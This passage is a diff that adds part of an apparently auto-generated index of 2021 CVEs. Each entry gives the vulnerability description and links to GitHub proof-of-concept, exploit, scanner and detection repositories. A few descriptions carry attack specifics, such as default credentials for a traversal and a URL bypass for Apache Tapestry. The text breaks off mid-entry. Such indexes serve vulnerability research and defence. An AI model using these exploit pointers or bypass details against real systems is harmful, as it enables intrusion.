+- [experimentalcrow1/TypeHub-Exploiter](https://github.com/experimentalcrow1/TypeHub-Exploiter)
+
+### CVE-2021-25162 (2021-03-30)
+
+A remote execution of arbitrary commands vulnerability was discovered in some Aruba Instant Access Point (IAP) products in version(s): Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below; Aruba Instant 6.5.x: 6.5.4.18 and below; Aruba Instant 8.3.x: 8.3.0.14 and below; Aruba Instant 8.5.x: 8.5.0.11 and below; Aruba Instant 8.6.x: 8.6.0.7 and below; Aruba Instant 8.7.x: 8.7.1.1 and below. Aruba has released patches for Aruba Instant that address this security vulnerability.
+
+
+- [twentybel0w/CVE-2021-25162](https://github.com/twentybel0w/CVE-2021-25162)
+
+### CVE-2021-25253 (2021-04-13)
+
+An improper access control vulnerability in Trend Micro Apex One, Trend Micro Apex One as a Service and OfficeScan XG SP1 on a resource used by the service could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
+
+
+- [msd0pe-1/CVE-2021-25253](https://github.com/msd0pe-1/CVE-2021-25253)
+
+### CVE-2021-25281 (2021-02-27)
+
+An issue was discovered in through SaltStack Salt before 3002.5. salt-api does not honor eauth credentials for the wheel_async client. Thus, an attacker can remotely run any wheel modules on the master.
+
+
+- [Immersive-Labs-Sec/CVE-2021-25281](https://github.com/Immersive-Labs-Sec/CVE-2021-25281)
+
+### CVE-2021-25374 (2021-04-09)
+
+An improper authorization vulnerability in Samsung Members "samsungrewards" scheme for deeplink in versions 2.4.83.9 in Android O(8.1) and below, and 3.9.00.9 in Android P(9.0) and above allows remote attackers to access a user data related with Samsung Account.
+
+
+- [WithSecureLabs/CVE-2021-25374_Samsung-Account-Access](https://github.com/WithSecureLabs/CVE-2021-25374_Samsung-Account-Access)
+
+### CVE-2021-25461 (2021-09-09)
+
+An improper length check in APAService prior to SMR Sep-2021 Release 1 results in stack based Buffer Overflow.
+
+
+- [bkojusner/CVE-2021-25461](https://github.com/bkojusner/CVE-2021-25461)
+
+### CVE-2021-25641 (2021-05-29)
+
+Each Apache Dubbo server will set a serialization id to tell the clients which serialization protocol it is working on. But for Dubbo versions before 2.7.8 or 2.6.9, an attacker can choose which serialization id the Provider will use by tampering with the byte preamble flags, aka, not following the server's instruction. This means that if a weak deserializer such as the Kryo and FST are somehow in code scope (e.g. if Kryo is somehow a part of a dependency), a remote unauthenticated attacker can tell the Provider to use the weak deserializer, and then proceed to exploit it.
+
+
+- [Dor-Tumarkin/CVE-2021-25641-Proof-of-Concept](https://github.com/Dor-Tumarkin/CVE-2021-25641-Proof-of-Concept)
+- [l0n3rs/CVE-2021-25641](https://github.com/l0n3rs/CVE-2021-25641)
+
+### CVE-2021-25642 (2022-08-25)
+
+ZKConfigurationStore which is optionally used by CapacityScheduler of Apache Hadoop YARN deserializes data obtained from ZooKeeper without validation. An attacker having access to ZooKeeper can run arbitrary commands as YARN user by exploiting this. Users should upgrade to Apache Hadoop 2.10.2, 3.2.4, 3.3.4 or later (containing YARN-11126) if ZKConfigurationStore is used.
+
+
+- [safe3s/CVE-2021-25642](https://github.com/safe3s/CVE-2021-25642)
+
+### CVE-2021-25646 (2021-01-29)
+
+Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests. This functionality is intended for use in high-trust environments, and is disabled by default. However, in Druid 0.20.0 and earlier, it is possible for an authenticated user to send a specially-crafted request that forces Druid to run user-provided JavaScript code for that request, regardless of server configuration. This can be leveraged to execute code on the target machine with the privileges of the Druid server process.
+
+
+- [yaunsky/cve-2021-25646](https://github.com/yaunsky/cve-2021-25646)
+- [lp008/CVE-2021-25646](https://github.com/lp008/CVE-2021-25646)
+- [Ormicron/CVE-2021-25646-GUI](https://github.com/Ormicron/CVE-2021-25646-GUI)
+- [Vulnmachines/Apache-Druid-CVE-2021-25646](https://github.com/Vulnmachines/Apache-Druid-CVE-2021-25646)
+- [1n7erface/PocList](https://github.com/1n7erface/PocList)
+- [givemefivw/CVE-2021-25646](https://github.com/givemefivw/CVE-2021-25646)
+- [j2ekim/CVE-2021-25646](https://github.com/j2ekim/CVE-2021-25646)
+
+### CVE-2021-25679 (2021-04-20)
+
+The AdTran Personal Phone Manager software is vulnerable to an authenticated stored cross-site scripting (XSS) issues. These issues impact at minimum versions 10.8.1 and below but potentially impact later versions as well since they have not previously been disclosed. Only version 10.8.1 was able to be confirmed during primary research. NOTE: The affected appliances NetVanta 7060 and NetVanta 7100 are considered End of Life and as such this issue will not be patched
+
+
+- [3ndG4me/AdTran-Personal-Phone-Manager-Vulns](https://github.com/3ndG4me/AdTran-Personal-Phone-Manager-Vulns)
+
+### CVE-2021-25735 (2021-04-14)
+
+A security issue was discovered in kube-apiserver that could allow node updates to bypass a Validating Admission Webhook. Clusters are only affected by this vulnerability if they run a Validating Admission Webhook for Nodes that denies admission based at least partially on the old state of the Node object. Validating Admission Webhook does not observe some previous fields.
+
+
+- [darryk10/CVE-2021-25735](https://github.com/darryk10/CVE-2021-25735)
+
+### CVE-2021-25741 (-)
+
+A security issue was discovered in Kubernetes where a user may be able to create a container with subpath volume mounts to access files & directories outside of the volume, including on the host filesystem.
+
+
+- [Betep0k/CVE-2021-25741](https://github.com/Betep0k/CVE-2021-25741)
+- [cdxiaodong/CVE-2021-25741](https://github.com/cdxiaodong/CVE-2021-25741)
+
+### CVE-2021-25790 (2021-07-23)
+
+Multiple stored cross site scripting (XSS) vulnerabilities in the "Register" module of House Rental and Property Listing 1.0 allows authenticated attackers to execute arbitrary web scripts or HTML via crafted payloads in all text fields except for Phone Number and Alternate Phone Number.
+
+
+- [MrCraniums/CVE-2021-25790-Multiple-Stored-XSS](https://github.com/MrCraniums/CVE-2021-25790-Multiple-Stored-XSS)
+
+### CVE-2021-25791 (2021-07-23)
+
+Multiple stored cross site scripting (XSS) vulnerabilities in the "Update Profile" module of Online Doctor Appointment System 1.0 allows authenticated attackers to execute arbitrary web scripts or HTML via crafted payloads in the First Name, Last Name, and Address text fields.
+
+
+- [MrCraniums/CVE-2021-25791-Multiple-Stored-XSS](https://github.com/MrCraniums/CVE-2021-25791-Multiple-Stored-XSS)
+
+### CVE-2021-25801 (2021-07-26)
+
+A buffer overflow vulnerability in the __Parse_indx component of VideoLAN VLC Media Player 3.0.11 allows attackers to cause an out-of-bounds read via a crafted .avi file.
+
+
+- [DShankle/VLC_CVE-2021-25801_Analysis](https://github.com/DShankle/VLC_CVE-2021-25801_Analysis)
+
+### CVE-2021-25804 (2021-07-26)
+
+A NULL-pointer dereference in "Open" in avi.c of VideoLAN VLC Media Player 3.0.11 can a denial of service (DOS) in the application.
+
+
+- [DShankle/VLC_CVE-2021-25804_Analysis](https://github.com/DShankle/VLC_CVE-2021-25804_Analysis)
+
+### CVE-2021-25837 (2021-02-08)
+
+Cosmos Network Ethermint <= v0.4.0 is affected by cache lifecycle inconsistency in the EVM module. Due to the inconsistency between the Storage caching cycle and the Tx processing cycle, Storage changes caused by a failed transaction are improperly reserved in memory. Although the bad storage cache data will be discarded at EndBlock, it is still valid in the current block, which enables many possible attacks such as an "arbitrary mint token".
+
+
+- [iczc/Ethermint-CVE-2021-25837](https://github.com/iczc/Ethermint-CVE-2021-25837)
+
+### CVE-2021-26084 (2021-08-10)
+
+In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
+
+
+- [crowsec-edtech/CVE-2021-26084](https://github.com/crowsec-edtech/CVE-2021-26084)
+- [alt3kx/CVE-2021-26084_PoC](https://github.com/alt3kx/CVE-2021-26084_PoC)
+- [dinhbaouit/CVE-2021-26084](https://github.com/dinhbaouit/CVE-2021-26084)
+- [JKme/CVE-2021-26084](https://github.com/JKme/CVE-2021-26084)
+- [hev0x/CVE-2021-26084_Confluence](https://github.com/hev0x/CVE-2021-26084_Confluence)
+- [Udyz/CVE-2021-26084](https://github.com/Udyz/CVE-2021-26084)
+- [prettyrecon/CVE-2021-26084_Confluence](https://github.com/prettyrecon/CVE-2021-26084_Confluence)
+- [0xf4n9x/CVE-2021-26084](https://github.com/0xf4n9x/CVE-2021-26084)
+- [Vulnmachines/Confluence_CVE-2021-26084](https://github.com/Vulnmachines/Confluence_CVE-2021-26084)
+- [Osyanina/westone-CVE-2021-26084-scanner](https://github.com/Osyanina/westone-CVE-2021-26084-scanner)
+- [b1gw00d/CVE-2021-26084](https://github.com/b1gw00d/CVE-2021-26084)
+- [taythebot/CVE-2021-26084](https://github.com/taythebot/CVE-2021-26084)
+- [bcdannyboy/CVE-2021-26084_GoPOC](https://github.com/bcdannyboy/CVE-2021-26084_GoPOC)
+- [smallpiggy/cve-2021-26084-confluence](https://github.com/smallpiggy/cve-2021-26084-confluence)
+- [maskerTUI/CVE-2021-26084](https://github.com/maskerTUI/CVE-2021-26084)
+- [BeRserKerSec/CVE-2021-26084-Nuclei-template](https://github.com/BeRserKerSec/CVE-2021-26084-Nuclei-template)
+- [p0nymc1/CVE-2021-26084](https://github.com/p0nymc1/CVE-2021-26084)
+- [Loneyers/CVE-2021-26084](https://github.com/Loneyers/CVE-2021-26084)
+- [Xc1Ym/cve_2021_26084](https://github.com/Xc1Ym/cve_2021_26084)
+- [wolf1892/confluence-rce-poc](https://github.com/wolf1892/confluence-rce-poc)
+- [smadi0x86/CVE-2021-26084](https://github.com/smadi0x86/CVE-2021-26084)
+- [kkin77/CVE-2021-26084-Confluence-OGNL](https://github.com/kkin77/CVE-2021-26084-Confluence-OGNL)
+- [1ZRR4H/CVE-2021-26084](https://github.com/1ZRR4H/CVE-2021-26084)
+- [GlennPegden2/cve-2021-26084-confluence](https://github.com/GlennPegden2/cve-2021-26084-confluence)
+- [toowoxx/docker-confluence-patched](https://github.com/toowoxx/docker-confluence-patched)
+- [nizar0x1f/CVE-2021-26084-patch-](https://github.com/nizar0x1f/CVE-2021-26084-patch-)
+- [dorkerdevil/CVE-2021-26084](https://github.com/dorkerdevil/CVE-2021-26084)
+- [ludy-dev/CVE-2021-26084_PoC](https://github.com/ludy-dev/CVE-2021-26084_PoC)
+- [wdjcy/CVE-2021-26084](https://github.com/wdjcy/CVE-2021-26084)
+- [orangmuda/CVE-2021-26084](https://github.com/orangmuda/CVE-2021-26084)
+- [TheclaMcentire/CVE-2021-26084_Confluence](https://github.com/TheclaMcentire/CVE-2021-26084_Confluence)
+- [Jun-5heng/CVE-2021-26084](https://github.com/Jun-5heng/CVE-2021-26084)
+- [lleavesl/CVE-2021-26084](https://github.com/lleavesl/CVE-2021-26084)
+- [quesodipesto/conflucheck](https://github.com/quesodipesto/conflucheck)
+- [30579096/Confluence-CVE-2021-26084](https://github.com/30579096/Confluence-CVE-2021-26084)
+- [antx-code/CVE-2021-26084](https://github.com/antx-code/CVE-2021-26084)
+- [vpxuser/CVE-2021-26084-EXP](https://github.com/vpxuser/CVE-2021-26084-EXP)
+- [nahcusira/CVE-2021-26084](https://github.com/nahcusira/CVE-2021-26084)
+- [BBD-YZZ/Confluence-RCE](https://github.com/BBD-YZZ/Confluence-RCE)
+
+### CVE-2021-26085 (2021-07-29)
+
+Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint. The affected versions are before version 7.4.10, and from version 7.5.0 before 7.12.3.
+
+
+- [ColdFusionX/CVE-2021-26085](https://github.com/ColdFusionX/CVE-2021-26085)
+
+### CVE-2021-26086 (2021-08-12)
+
+Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. The affected versions are before version 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.16.1.
+
+
+- [Jeromeyoung/CVE-2021-26086](https://github.com/Jeromeyoung/CVE-2021-26086)
+- [ColdFusionX/CVE-2021-26086](https://github.com/ColdFusionX/CVE-2021-26086)
+
+### CVE-2021-26088 (2021-07-12)
+
+An improper authentication vulnerability in FSSO Collector version 5.0.295 and below may allow an unauthenticated user to bypass a FSSO firewall policy and access the protected network via sending specifically crafted UDP login notification packets.
+
+
+- [theogobinet/CVE-2021-26088](https://github.com/theogobinet/CVE-2021-26088)
+
+### CVE-2021-26102
+- [SleepyCofe/CVE-2021-26102](https://github.com/SleepyCofe/CVE-2021-26102)
+
+### CVE-2021-26119 (2021-02-22)
+
+Smarty before 3.1.39 allows a Sandbox Escape because $smarty.template_object can be accessed in sandbox mode.
+
+
+- [Udyz/CVE-2021-26119](https://github.com/Udyz/CVE-2021-26119)
+
+### CVE-2021-26121
+- [sourceincite/CVE-2021-26121](https://github.com/sourceincite/CVE-2021-26121)
+
+### CVE-2021-26258 (2022-05-12)
+
+Improper access control for the Intel(R) Killer(TM) Control Center software before version 2.4.3337.0 may allow an authorized user to potentially enable escalation of privilege via local access.
+
+
+- [zwclose/CVE-2021-26258](https://github.com/zwclose/CVE-2021-26258)
+
+### CVE-2021-26294 (2021-03-07)
+
+An issue was discovered in AfterLogic Aurora through 7.7.9 and WebMail Pro through 7.7.9. They allow directory traversal to read files (such as a data/settings/settings.xml file containing admin panel credentials), as demonstrated by dav/server.php/files/personal/%2e%2e when using the caldav_public_user account (with caldav_public_user as its password).
+
+
+- [dorkerdevil/CVE-2021-26294](https://github.com/dorkerdevil/CVE-2021-26294)
+
+### CVE-2021-26295 (2021-03-22)
+
+Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz.
+
+
+- [yumusb/CVE-2021-26295](https://github.com/yumusb/CVE-2021-26295)
+- [rakjong/CVE-2021-26295-Apache-OFBiz](https://github.com/rakjong/CVE-2021-26295-Apache-OFBiz)
+- [dskho/CVE-2021-26295](https://github.com/dskho/CVE-2021-26295)
+- [coolyin001/CVE-2021-26295--](https://github.com/coolyin001/CVE-2021-26295--)
+- [S0por/CVE-2021-26295-Apache-OFBiz-EXP](https://github.com/S0por/CVE-2021-26295-Apache-OFBiz-EXP)
+- [yuaneuro/ofbiz-poc](https://github.com/yuaneuro/ofbiz-poc)
+
+### CVE-2021-26411 (2021-03-11)
+
+Internet Explorer Memory Corruption Vulnerability
+
+
+- [CrackerCat/CVE-2021-26411](https://github.com/CrackerCat/CVE-2021-26411)
+
+### CVE-2021-26414 (2021-06-08)
+
+Windows DCOM Server Security Feature Bypass
+
+
+- [Nels2/dcom_10036_Solver](https://github.com/Nels2/dcom_10036_Solver)
+
+### CVE-2021-26415 (2021-04-13)
+
+Windows Installer Elevation of Privilege Vulnerability
+
+
+- [adenkiewicz/CVE-2021-26415](https://github.com/adenkiewicz/CVE-2021-26415)
+
+### CVE-2021-26690 (2021-06-10)
+
+Apache HTTP Server versions 2.4.0 to 2.4.46 A specially crafted Cookie header handled by mod_session can cause a NULL pointer dereference and crash, leading to a possible Denial Of Service
+
+
+- [dja2TaqkGEEfA45/CVE-2021-26690](https://github.com/dja2TaqkGEEfA45/CVE-2021-26690)
+
+### CVE-2021-26691 (2021-06-10)
+
+In Apache HTTP Server versions 2.4.0 to 2.4.46 a specially crafted SessionHeader sent by an origin server could cause a heap overflow
+
+
+- [dja2TaqkGEEfA45/CVE-2021-26691](https://github.com/dja2TaqkGEEfA45/CVE-2021-26691)
+
+### CVE-2021-26700 (2021-02-25)
+
+Visual Studio Code npm-script Extension Remote Code Execution Vulnerability
+
+
+- [jackadamson/CVE-2021-26700](https://github.com/jackadamson/CVE-2021-26700)
+- [june-in-exile/CVE-2021-26700](https://github.com/june-in-exile/CVE-2021-26700)
+
+### CVE-2021-26708 (2021-02-05)
+
+A local privilege escalation was discovered in the Linux kernel before 5.10.13. Multiple race conditions in the AF_VSOCK implementation are caused by wrong locking in net/vmw_vsock/af_vsock.c. The race conditions were implicitly introduced in the commits that added VSOCK multi-transport support.
+
+
+- [jordan9001/vsock_poc](https://github.com/jordan9001/vsock_poc)
+- [azpema/CVE-2021-26708](https://github.com/azpema/CVE-2021-26708)
+
+### CVE-2021-26714 (2021-03-29)
+
+The Enterprise License Manager portal in Mitel MiContact Center Enterprise before 9.4 could allow a user to access restricted files and folders due to insufficient access control. A successful exploit could allow an attacker to view and modify application data via Directory Traversal.
+
+
+- [PwCNO-CTO/CVE-2021-26714](https://github.com/PwCNO-CTO/CVE-2021-26714)
+
+### CVE-2021-26814 (2021-03-06)
+
+Wazuh API in Wazuh from 4.0.0 to 4.0.3 allows authenticated users to execute arbitrary code with administrative privileges via /manager/files URI. An authenticated user to the service may exploit incomplete input validation on the /manager/files API to inject arbitrary code within the API service script.
+
+
+- [WickdDavid/CVE-2021-26814](https://github.com/WickdDavid/CVE-2021-26814)
+- [CYS4srl/CVE-2021-26814](https://github.com/CYS4srl/CVE-2021-26814)
+- [paolorabbito/Internet-Security-Project---CVE-2021-26814](https://github.com/paolorabbito/Internet-Security-Project---CVE-2021-26814)
+
+### CVE-2021-26828 (2021-06-11)
+
+OpenPLC ScadaBR through 0.9.1 on Linux and through 1.12.4 on Windows allows remote authenticated users to upload and execute arbitrary JSP files via view_edit.shtm.
+
+
+- [hev0x/CVE-2021-26828_ScadaBR_RCE](https://github.com/hev0x/CVE-2021-26828_ScadaBR_RCE)
+
+### CVE-2021-26832 (2021-04-14)
+
+Cross Site Scripting (XSS) in the "Reset Password" page form of Priority Enterprise Management System v8.00 allows attackers to execute javascript on behalf of the victim by sending a malicious URL or directing the victim to a malicious site.
+
+
+- [NagliNagli/CVE-2021-26832](https://github.com/NagliNagli/CVE-2021-26832)
+
+### CVE-2021-26855 (2021-03-02)
+
+Microsoft Exchange Server Remote Code Execution Vulnerability
+
+
+- [sgnls/exchange-0days-202103](https://github.com/sgnls/exchange-0days-202103)
+- [soteria-security/HAFNIUM-IOC](https://github.com/soteria-security/HAFNIUM-IOC)
+- [cert-lv/exchange_webshell_detection](https://github.com/cert-lv/exchange_webshell_detection)
+- [conjojo/Microsoft_Exchange_Server_SSRF_CVE-2021-26855](https://github.com/conjojo/Microsoft_Exchange_Server_SSRF_CVE-2021-26855)
+- [pussycat0x/CVE-2021-26855-SSRF](https://github.com/pussycat0x/CVE-2021-26855-SSRF)
+- [La3B0z/CVE-2021-26855-SSRF-Exchange](https://github.com/La3B0z/CVE-2021-26855-SSRF-Exchange)
+- [mekhalleh/exchange_proxylogon](https://github.com/mekhalleh/exchange_proxylogon)
+- [Yt1g3r/CVE-2021-26855_SSRF](https://github.com/Yt1g3r/CVE-2021-26855_SSRF)
+- [hackerxj007/CVE-2021-26855](https://github.com/hackerxj007/CVE-2021-26855)
+- [dwisiswant0/proxylogscan](https://github.com/dwisiswant0/proxylogscan)
+- [mauricelambert/ExchangeWeaknessTest](https://github.com/mauricelambert/ExchangeWeaknessTest)
+- [DCScoder/Exchange_IOC_Hunter](https://github.com/DCScoder/Exchange_IOC_Hunter)
+- [srvaccount/CVE-2021-26855-PoC](https://github.com/srvaccount/CVE-2021-26855-PoC)
+- [h4x0r-dz/CVE-2021-26855](https://github.com/h4x0r-dz/CVE-2021-26855)
+- [alt3kx/CVE-2021-26855_PoC](https://github.com/alt3kx/CVE-2021-26855_PoC)
+- [raheel0x01/CVE-2021-26855](https://github.com/raheel0x01/CVE-2021-26855)
+- [hackerschoice/CVE-2021-26855](https://github.com/hackerschoice/CVE-2021-26855)
+- [SCS-Labs/HAFNIUM-Microsoft-Exchange-0day](https://github.com/SCS-Labs/HAFNIUM-Microsoft-Exchange-0day)
+- [KotSec/CVE-2021-26855-Scanner](https://github.com/KotSec/CVE-2021-26855-Scanner)
+- [hakivvi/proxylogon](https://github.com/hakivvi/proxylogon)
+- [ZephrFish/Exch-CVE-2021-26855](https://github.com/ZephrFish/Exch-CVE-2021-26855)
+- [mil1200/ProxyLogon-CVE-2021-26855](https://github.com/mil1200/ProxyLogon-CVE-2021-26855)
+- [evilashz/ExchangeSSRFtoRCEExploit](https://github.com/evilashz/ExchangeSSRFtoRCEExploit)
+- [ZephrFish/Exch-CVE-2021-26855_Priv](https://github.com/ZephrFish/Exch-CVE-2021-26855_Priv)
+- [Mr-xn/CVE-2021-26855-d](https://github.com/Mr-xn/CVE-2021-26855-d)
+- [RickGeex/ProxyLogon](https://github.com/RickGeex/ProxyLogon)
+- [Immersive-Labs-Sec/ProxyLogon](https://github.com/Immersive-Labs-Sec/ProxyLogon)
+- [shacojx/Scan-Vuln-CVE-2021-26855](https://github.com/shacojx/Scan-Vuln-CVE-2021-26855)
+- [TaroballzChen/ProxyLogon-CVE-2021-26855-metasploit](https://github.com/TaroballzChen/ProxyLogon-CVE-2021-26855-metasploit)
+- [p0wershe11/ProxyLogon](https://github.com/p0wershe11/ProxyLogon)
+- [shacojx/CVE-2021-26855-exploit-Exchange](https://github.com/shacojx/CVE-2021-26855-exploit-Exchange)
+- [catmandx/CVE-2021-26855-Exchange-RCE](https://github.com/catmandx/CVE-2021-26855-Exchange-RCE)
+- [hictf/CVE-2021-26855-CVE-2021-27065](https://github.com/hictf/CVE-2021-26855-CVE-2021-27065)
+- [praetorian-inc/proxylogon-exploit](https://github.com/praetorian-inc/proxylogon-exploit)
+- [Flangvik/SharpProxyLogon](https://github.com/Flangvik/SharpProxyLogon)
+- [hosch3n/ProxyVulns](https://github.com/hosch3n/ProxyVulns)
+- [Nick-Yin12/106362522](https://github.com/Nick-Yin12/106362522)
+- [yaoxiaoangry3/Flangvik](https://github.com/yaoxiaoangry3/Flangvik)
+- [thau0x01/poc_proxylogon](https://github.com/thau0x01/poc_proxylogon)
+- [1342486672/Flangvik](https://github.com/1342486672/Flangvik)
+- [TheDudeD6/ExchangeSmash](https://github.com/TheDudeD6/ExchangeSmash)
+- [kh4sh3i/ProxyLogon](https://github.com/kh4sh3i/ProxyLogon)
+- [byinarie/Zirconium](https://github.com/byinarie/Zirconium)
+- [ssrsec/Microsoft-Exchange-RCE](https://github.com/ssrsec/Microsoft-Exchange-RCE)
+- [MacAsure/cve-2021-26855](https://github.com/MacAsure/cve-2021-26855)
+- [timb-machine-mirrors/testanull-CVE-2021-26855_read_poc.txt](https://github.com/timb-machine-mirrors/testanull-CVE-2021-26855_read_poc.txt)
+
+### CVE-2021-26856
+- [avi8892/CVE-2021-26856](https://github.com/avi8892/CVE-2021-26856)
+
+### CVE-2021-26857 (2021-03-02)
+
+Microsoft Exchange Server Remote Code Execution Vulnerability
+
+
+- [sirpedrotavares/Proxylogon-exploit](https://github.com/sirpedrotavares/Proxylogon-exploit)
+
+### CVE-2021-26868 (2021-03-11)
+
+Windows Graphics Component Elevation of Privilege Vulnerability
+
+
+- [KangD1W2/CVE-2021-26868](https://github.com/KangD1W2/CVE-2021-26868)
+
+### CVE-2021-26871 (2021-03-11)
+
+Windows WalletService Elevation of Privilege Vulnerability
+
+
+- [fr4nkxixi/CVE-2021-26871_POC](https://github.com/fr4nkxixi/CVE-2021-26871_POC)
+
+### CVE-2021-26882 (2021-03-11)
+
+Remote Access API Elevation of Privilege Vulnerability
+
+
+- [taiji-xo/CVE-2021-26882](https://github.com/taiji-xo/CVE-2021-26882)
+
+### CVE-2021-26903 (2021-02-26)
+
+LMA ISIDA Retriever 5.2 is vulnerable to XSS via query['text'].
+
+
+- [Security-AVS/CVE-2021-26903](https://github.com/Security-AVS/CVE-2021-26903)
+
+### CVE-2021-26904 (2021-02-26)
+
+LMA ISIDA Retriever 5.2 allows SQL Injection.
+
+
+- [Security-AVS/-CVE-2021-26904](https://github.com/Security-AVS/-CVE-2021-26904)
+
+### CVE-2021-26943 (2021-03-31)
+
+The UX360CA BIOS through 303 on ASUS laptops allow an attacker (with the ring 0 privilege) to overwrite nearly arbitrary physical memory locations, including SMRAM, and execute arbitrary code in the SMM (issue 3 of 3).
+
+
+- [tandasat/SmmExploit](https://github.com/tandasat/SmmExploit)
+
+### CVE-2021-27065 (2021-03-02)
+
+Microsoft Exchange Server Remote Code Execution Vulnerability
+
+
+- [adamrpostjr/cve-2021-27065](https://github.com/adamrpostjr/cve-2021-27065)
+
+### CVE-2021-27180 (2021-04-14)
+
+An issue was discovered in MDaemon before 20.0.4. There is Reflected XSS in Webmail (aka WorldClient). It can be exploited via a GET request. It allows performing any action with the privileges of the attacked user.
+
+
+- [chudyPB/MDaemon-Advisories](https://github.com/chudyPB/MDaemon-Advisories)
+
+### CVE-2021-27187 (2021-02-12)
+
+The Sovremennye Delovye Tekhnologii FX Aggregator terminal client 1 stores authentication credentials in cleartext in login.sav when the Save Password box is checked.
+
+
+- [jet-pentest/CVE-2021-27187](https://github.com/jet-pentest/CVE-2021-27187)
+
+### CVE-2021-27188 (2021-02-12)
+
+The Sovremennye Delovye Tekhnologii FX Aggregator terminal client 1 allows attackers to cause a denial of service (access suspended for five hours) by making five invalid login attempts to a victim's account.
+
+
+- [jet-pentest/CVE-2021-27188](https://github.com/jet-pentest/CVE-2021-27188)
+
+### CVE-2021-27190 (2021-02-12)
+
+A Stored Cross Site Scripting(XSS) Vulnerability was discovered in PEEL SHOPPING 9.3.0 and 9.4.0, which are publicly available. The user supplied input containing polyglot payload is echoed back in javascript code in HTML response. This allows an attacker to input malicious JavaScript which can steal cookie, redirect them to other malicious website, etc.
+
+
+- [anmolksachan/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS](https://github.com/anmolksachan/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS)
+
+### CVE-2021-27198 (2021-02-26)
+
+An issue was discovered in Visualware MyConnection Server before v11.1a. Unauthenticated Remote Code Execution can occur via Arbitrary File Upload in the web service when using a myspeed/sf?filename= URI. This application is written in Java and is thus cross-platform. The Windows installation runs as SYSTEM, which means that exploitation gives one Administrator privileges on the target system.
+
+
+- [rwincey/CVE-2021-27198](https://github.com/rwincey/CVE-2021-27198)
+
+### CVE-2021-27211 (2021-02-15)
+
+steghide 0.5.1 relies on a certain 32-bit seed value, which makes it easier for attackers to detect hidden data.
+
+
+- [b4shfire/stegcrack](https://github.com/b4shfire/stegcrack)
+
+### CVE-2021-27246 (2021-04-14)
+
+This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of TP-Link Archer A7 AC1750 1.0.15 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of MAC addresses by the tdpServer endpoint. A crafted TCP message can write stack pointers to the stack. An attacker can leverage this vulnerability to execute code in the context of the root user. Was ZDI-CAN-12306.
+
+
+- [synacktiv/CVE-2021-27246_Pwn2Own2020](https://github.com/synacktiv/CVE-2021-27246_Pwn2Own2020)
+
+### CVE-2021-27328 (2021-02-19)
+
+Yeastar NeoGate TG400 91.3.0.3 devices are affected by Directory Traversal. An authenticated user can decrypt firmware and can read sensitive information, such as a password or decryption key.
+
+
+- [SQSamir/CVE-2021-27328](https://github.com/SQSamir/CVE-2021-27328)
+
+### CVE-2021-27338 (2021-07-20)
+
+Faraday Edge before 3.7 allows XSS via the network/create/ page and its network name parameter.
+
+
+- [Pho03niX/CVE-2021-27338](https://github.com/Pho03niX/CVE-2021-27338)
+
+### CVE-2021-27342 (2021-05-17)
+
+An authentication brute-force protection mechanism bypass in telnetd in D-Link Router model DIR-842 firmware version 3.0.2 allows a remote attacker to circumvent the anti-brute-force cool-down delay period via a timing-based side-channel attack
+
+
+- [mavlevin/D-Link-CVE-2021-27342-exploit](https://github.com/mavlevin/D-Link-CVE-2021-27342-exploit)
+
+### CVE-2021-27403 (2021-02-19)
+
+Askey RTF8115VW BR_SV_g11.11_RTF_TEF001_V6.54_V014 devices allow cgi-bin/te_acceso_router.cgi curWebPage XSS.
+
+
+- [bokanrb/CVE-2021-27403](https://github.com/bokanrb/CVE-2021-27403)
+
+### CVE-2021-27404 (2021-02-19)
+
+Askey RTF8115VW BR_SV_g11.11_RTF_TEF001_V6.54_V014 devices allow injection of a Host HTTP header.
+
+
+- [bokanrb/CVE-2021-27404](https://github.com/bokanrb/CVE-2021-27404)
+
+### CVE-2021-27513 (2021-02-21)
+
+The module admin_ITSM in EyesOfNetwork 5.3-10 allows remote authenticated users to upload arbitrary .xml.php files because it relies on "le filtre userside."
+
+
+- [ArianeBlow/CVE-2021-27513-CVE-2021-27514](https://github.com/ArianeBlow/CVE-2021-27513-CVE-2021-27514)
+- [ArianeBlow/CVE-2021-27513](https://github.com/ArianeBlow/CVE-2021-27513)
+
+### CVE-2021-27651 (2021-04-29)
+
+In versions 8.2.1 through 8.5.2 of Pega Infinity, the password reset functionality for local accounts can be used to bypass local authentication checks.
+
+
+- [samwcyo/CVE-2021-27651-PoC](https://github.com/samwcyo/CVE-2021-27651-PoC)
+- [Vulnmachines/CVE-2021-27651](https://github.com/Vulnmachines/CVE-2021-27651)
+- [orangmuda/CVE-2021-27651](https://github.com/orangmuda/CVE-2021-27651)
+
+### CVE-2021-27850 (2021-04-15)
+
+A critical unauthenticated remote code execution vulnerability was found all recent versions of Apache Tapestry. The affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. The vulnerability I have found is a bypass of the fix for CVE-2019-0195. Recap: Before the fix of CVE-2019-0195 it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL. An attacker was able to download the file `AppModule.class` by requesting the URL `http://localhost:8080/assets/something/services/AppModule.class` which contains a HMAC secret key. The fix for that bug was a blacklist filter that checks if the URL ends with `.class`, `.properties` or `.xml`. Bypass: Unfortunately, the blacklist solution can simply be bypassed by appending a `/` at the end of the URL: `http://localhost:8080/assets/something/services/AppModule.class/` The slash is stripped after the blacklist check and the file `AppModule.class` is loaded into the response. This class usually contains the HMAC secret key which is used to sign serialized Java objects. With the knowledge of that key an attacker can sign a Java gadget chain that leads to RCE (e.g. CommonsBeanUtils1 from 